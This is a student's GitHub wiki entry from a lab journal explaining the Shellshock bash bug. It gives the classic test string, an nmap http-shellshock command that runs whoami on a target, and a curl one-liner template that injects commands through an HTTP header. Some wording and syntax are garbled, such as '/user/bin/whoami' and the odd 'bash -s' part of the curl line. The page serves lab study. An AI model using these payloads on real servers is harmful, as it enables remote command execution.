ShellShock - Foren-Ken/tech-journal GitHub Wiki

Description

Shellshock is a common bug utilizing the way *Nix systems read to execute code. This is due to bash not stopping after an environment variable is set. Such that an empty environment variable x='() { :;}; isn't the end of the parsing for the system. This allows for the well known: x='() { :;}; echo vulnerable' bash -c "echo test" which allows for the command "echo" to be remotely. This expands to other OS commands.

Discovery

The lab 4.1 required us to use nmap to search for the vulnerability on port 80 with the following command: sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /user/bin/whoami" [IP ADDRESS]

Current Creations:

curl -H 'Test: () { :; }; echo ; echo ; [location of command] [argument(s)]' bash -s :'' http://host/[Vulnirable Area] This one liner submits a header containing Test: () { :; }; echo ; echo ; [location of command] [argument(s)]' bash -s :'' to http://host/[Vulnirable Area]. Like in the description section, this syntax following a familiar x='() { :;}; echo vulnerable' bash -c "echo test" syntax.